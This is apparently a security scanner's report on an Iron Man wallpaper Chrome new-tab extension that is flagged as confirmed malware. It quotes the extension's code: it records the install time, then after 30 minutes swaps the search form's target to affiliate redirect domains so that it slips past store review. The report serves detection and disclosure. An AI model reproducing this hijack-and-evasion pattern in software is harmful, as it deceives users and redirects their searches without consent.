Security Alert: Confirmed Malware
Iron Man Wallpapers Custom Tab
ID: eldglaapjapnpcbhpfplhcnecmgjfied
Supported Languages
Extension Info & Metadata
Publisher Contextual Analysis
- Author
- chromenewtab.comView Profile
- Privacy
- Privacy Policy
- MX records exist
- Yes
- Domain exists
- Yes
- Is disposable
- No
- Is role-based
- No
- Mailbox exists
- Yes
Give your browser a new look with Iron Man backgrounds
Hello guys Thank you for uploading the chrome new tab Extensions that we designed for Iron Man with great images. Thanks to Iron Man Extensions, great visuals will accompany you in every new tab you open and will allow you to have a pleasant time. Iron Man wallpaper features โฝ๏ธ quality visuals in every new tab you open โฝ๏ธ search bar in the middle of the page โฝ๏ธ Date and time in the lower right corner โฝ๏ธ Shortcut icons of popular sites in the middle of the page โฝ๏ธ Popular games icon for you to play 500+ games for free โฝ๏ธ You can use Iron Man background images mixed or fixed You can share our Iron Man application with your friends and family so that they can have a good time too. You can rate us as Stars and write a comment on the Chrome Store.
After 1800 seconds (30 minutes) from installation, the search form's action URL is silently replaced with a randomly chosen third-party domain from the list 'addilos,addiyos,gundil'. All subsequent user searches are then submitted to one of these affiliate/tracking search redirectors instead of Google. The 30-minute delay is a deliberate anti-detection measure: during Chrome Web Store review (which happens shortly after submission) the extension behaves normally, but real users get their searches hijacked.
$(window) .on('load', function() { chrome.storage.local.get(['inti'], function(resultinti) { if (Math.floor(Date.now() / 1000) - resultinti.inti > 1800) { var sp = $("#sf") .data("sp") .split(","); var spr = sp[Math.floor(Math.random() * sp.length)]; $('#sf') .attr('action', 'https://www.' + spr + '.com/index.html'); } });The search form embeds a hidden configuration payload in its data-sp attribute: 'addilos,addiyos,gundil'. These are known affiliate search redirect domains. The form initially targets Google to appear legitimate, but the JavaScript uses this data attribute as its list of hijack targets once the time-delay evasion window passes.
< form id="sf" target="_top" action="https://www.google.com/search" method="get" class="search-form" data - sp="addilos,addiyos,gundil">On first install, the service worker records the exact Unix timestamp into local storage under the key 'inti'. This value is later read by the new tab page JS to determine when 30 minutes have elapsed, at which point the search engine hijacking activates. Recording install time serves no legitimate user-facing feature; its sole purpose is to implement the time-delayed evasion logic.
chrome.runtime.onInstalled.addListener(function(details) { if (details.reason == "install") { ... chrome.storage.local.set({ inti: Math.floor(Date.now() / 1000) }, function() {});By severity
Versions scanned
Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 0.3.85 | 3 |
Files with findings
3 distinct paths โ top paths by unique finding count:
- fTcVhU/RfMwvTY.js1
- fTcVhU/zDgoY4.js1
- qrAgoJ.html1
URLs
View the external URLs this extension communicates with to understand its network activity and data interactions.
Gain full insight into all external connections.
Upgrade for full visibility.
Gain full insight into all external connections.
Upgrade for full visibility.
Browse and explore files within this extension package
Gain full insight into all external connections.
Upgrade for full visibility.